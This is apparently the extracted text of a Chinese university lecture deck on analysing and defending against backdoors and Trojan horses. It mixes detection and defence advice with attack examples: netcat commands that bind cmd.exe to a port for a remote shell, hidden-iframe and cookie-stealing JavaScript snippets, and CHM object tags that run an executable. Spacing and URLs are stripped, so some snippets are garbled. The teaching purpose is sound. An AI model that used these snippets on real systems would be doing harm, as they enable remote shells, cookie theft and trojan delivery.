2020/9/171恶意软件(病毒)的分析与防范Defence&analysisofmalware计算机学院傅建明Fujms@sina.com2020/9/172后门•后门是一个允许攻击者绕过系统中常规安全控制机制的程序,他按照攻击者自己的意图提供通道。•后门的重点在于为攻击者提供进入目标计算机的通道。2020/9/173后门的类型•本地权限的提升–对系统有访问权的攻击者变换其权限等级成为管理员,然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。•单个命令的远程执行–攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后门执行攻击者的命令并将输出返回给攻击者。•远程命令行解释器访问–正如远程Shell,这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。•远程控制GUI–攻击者可以看到目标计算机的GUI,控制鼠标的移动,输入对键盘的操作,这些都通过网络实现。2020/9/174后门的安装•自己植入(物理接触或入侵之后)•通过病毒、蠕虫和恶意移动代码•欺骗受害者自己安装–Email–远程共享–BT下载–……2020/9/175后门举例•NetCat:通用的网络连接工具用法一:nc–l–p5000–ecmd.exenc127.0.0.15000用法二:nc–l–p5000nc127.0.0.15000–ecmd.exe•cshell.exe2020/9/176其他Windows下的后门程序•CryptCat•Tini–提供通向Tcp端口7777,只有3K。•……2020/9/1772020/9/178无端口后门-如何唤醒•ICMP后门–不使用TCP/UDP协议。–使用ICMP协议进行通信。–难以检测。•非混合型探测后门攻击者将触发指令发送到对方计算机。–难以检测。(Cd00r:syntoportx,syntoporty,syntoportz)•混合型探测后门–只要攻击者将触发指令发送到对方网络中即可触发后门。–更加难以检测。(syntoportx,syntoportx,syntoportxindifferentIps)2020/9/179Bits--glacier•进程管理器中看不到•平时没有端口,只是在系统中充当卧底的角色•提供正向连接和反向连接两种功能•仅适用于Windows2000/XP/2003–具体用法和例子可以查看“难以觉察的后门--BITS”一文2020/9/1710GUI(GraphicsUserInterface)远程控制•并非所有的GUI远程控制都是恶意的–VNC(VirtualNetworkComputing)–WindowsTerminalServices–PCAnywhere–BackOrifice2000–SubSeven2020/9/1711VNC•英国剑桥大学AT&T实验室在2002年开发的轻量型的远程控制计算机软件,任何人都可免费取得该软件。•VNC软件主要由两个部分组成:–VNCserver及VNCviewer。•VNCserver与VNCviewer支持多种操作系统,如windows,Linux,MacOS及Unix系列(Unix,Solaris等),因此可将VNCserver及VNCviewer分别安装在不同的操作系统中进行控制。•也可以通过一般的网络浏览器(如IE等)来控制被控端(需要Java虚拟机的支持)。2020/9/1712VNC程序举例2020/9/1713后门的启动感染普通执行文件或系统文件添加程序到“开始”-“程序”-“启动”选项修改系统配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相关启动选项通过修改注册表启动键值修改文件关联的打开方式添加计划任务利用自定义文件夹风格注册为InternetExplorer的BHO(BrowserHelperObject)组件具体请参考“Windows的自启动方式”一文。2020/9/1714检测Windows后门启动技术•手工检测–注册表启动键值–启动选项–关联方式–计划任务–…•利用工具检测–Msconfig–AutoRuns•–完整性检测程序(GFILANguardSystemIntegrityMonitor,IonxDataSentinel)2020/9/1715AutoRuns的运行界面2020/9/1716如何防御后门--普通后门•培养良好的安全意识和习惯。•使用网络防火墙封锁与端口的连接。–仅允许最少数量的端口通信通过防火墙–天网个人防火墙,瑞星防火墙,江民黑客防火墙,ZoneAlarm,NortonPersonalFirewall……•经常利用端口扫描器扫描主机或端口查看工具查找本地端口监听程序。–Nmap,Xscan,NC,Fport,TcpView,IceSword……2020/9/1717如何防御后门--无端口后门•查找不寻常的程序•查找不寻常的进程•利用基于网络的IDS查找隐蔽的后门命令,如Snort。•检测本地和网络中的混杂模式的网卡–本地检测嗅探器(Promiscdetect.exe)–远程检测嗅探器(Sentinel,AntiSniff)2020/9/17182.特洛伊木马•特洛伊木马是一个程序,他看起来具有某个有用的或善意的目的,但是实际上掩盖着一些隐藏的恶意功能。–欺骗用户或者系统管理员安装–在计算机上与“正常”的程序一起混合运行,将自己伪装得看起来属于该系统。2020/9/1719后门VS特洛伊木马•如果一个程序仅仅提供远程访问,那么它只是一个后门。•如果攻击者将这些后门功能伪装成某些其他良性程序,那么就涉及到真正的特洛伊木马。2020/9/1720特洛伊木马木马系统软件一般由木马配置程序、控制端程序和木马程序(服务器程序)等三部分组成。木马程序,也称服务器程序,它驻留在受害者的系统中,非法获取其操作权限,负责接收控制端指令,并根据指令或配置发送数据给控制端。木马配置程序设置木马程序的端口号、触发条件、木马名称等,使其在服务端藏得更隐蔽,有时该配置功能被集成在控制端程序菜单内,不单独作为一个程序。控制端程序控制远程服务器,有些程序集成了木马配置的功能。2020/9/1721(1)email(木马)(1)端口扫描(2)OICQ(木马)(3)Web/FTP/BBS(木马)(2)email(3)UDP通告(4)virus/worm(木马)(5)磁盘/光盘(木马)(b)木马与控制端的首次握手(a)中木马的途径(1)木马通道的配置参数(1)命令(2)木马通道的响应参数(2)数据(c)建立木马通道(d)控制端与木马的交互图7.1木马的工作原理受害主机互联网其它介质受害主机木马(远程服务器)控制端受害主机木马控制端受害主机木马控制端木马通道2020/9/17222.1名字欺骗修改文件的文件名以欺骗用户•与Windows扩展名放在一起–Beauty.jpg.exe•模仿其他文件名–httpd,iexplore,notepad,ups,svchost…–不能用“任务管理器”删除的进程名•Csrss.exe,services.exe,smss.exe,winlogon.exe,system,systemidleprocess•路径威胁–如将木马命名为explorer.exe放在C:\下。2020/9/1723对命名陷阱的防御•确定指定进程属于哪个程序–Fport,icesword,tcpview…•使用杀进程工具进行查杀–Pskill,icesword…2020/9/17242.2文件捆绑•恶意程序与正常程序捆绑–捆绑工具•EXE捆绑机,Wrappers,binders,EXEbinders……•CHM,Flash….–压缩软件(winrar)•WinRMSetup30.exe•防御–使用反病毒软件进行检测,并及时更新病毒库。2020/9/17252.3软件下载•从网上下载的软件是你真正需要的软件吗?•从网上下载的软件是否被恶意修改过?防御措施–用户注意–完整性检测(如MD5,FileChecker)–小心测试新软件2020/9/17262.4软件本身带毒•内部员工注入恶意代码•软件开发的全球化趋势–多个部门联合开发软件,一层层的外包2020/9/17272.5Html传播•网页病毒的传播方式•Flash传播网页•email传播网页•Chm传播网页木马•Exe2bmp•正常网页中携带2020/9/1728网页病毒的传播方式•1-美丽的网页名称,以及利用浏览者的无知.•URL1:•URL2:@e3i5.yeah.net/images/mm/plmm001.gif2020/9/1729plmm001.gif•html•BODY•iframesrc==0height=0frameborder=0/IFRAME•centerimgsrc=传播网页•用FlashMX制作:第一帧,打开动作面板,进入Actions\Brower\NetWork\GetUrlhttp://网页木马地址,windows:_self第二帧,Actions\Brower\NetWork\loadmoviehttp://…*.swf2020/9/1731email传播网页1.scriptlanguage=javascriptWindow.open(“=‘+document.cookie”)/script2.bodyonload=“windows.location=‘’;”/body2020/9/1732email传播网页3.framesetcols=“100%,*”framesrc=“”scrolling=“auto”/frameset4.metahttp-equiv=“refresh”content=“0;URL=”5iframesrc==0height=0frameborder=0/IFRAME2020/9/1733email传播网页•objectdata=“htpp://xxxxx/x.ASPwidth=0height=02020/9/1734Chm传播网页木马•x.htm:OBJECTNAME='X'CLASSID='CLSID:11111111-1111-1111-1111-111111111123'wight=0height=0CODEBASE='x.exe'orOBJECTWidth=0Height=0style=display:none;TYPE=application/x-oleobjectCODEBASE=x.exe•EasyCHMorQuickchm把x.htm和x.exe生成x.chm2020/9/1735exe2bmp•exe2bmp可以将一个.exe可执行文件生成同名的.bmp、.asp、.htm三个文件。将这三个文件放到支持ASP的空间里边,当别人打开.htm网页文件的时候,先前的.exe木马将被自动下载到对方的硬盘并运行。•Forexample•x.exeproduce: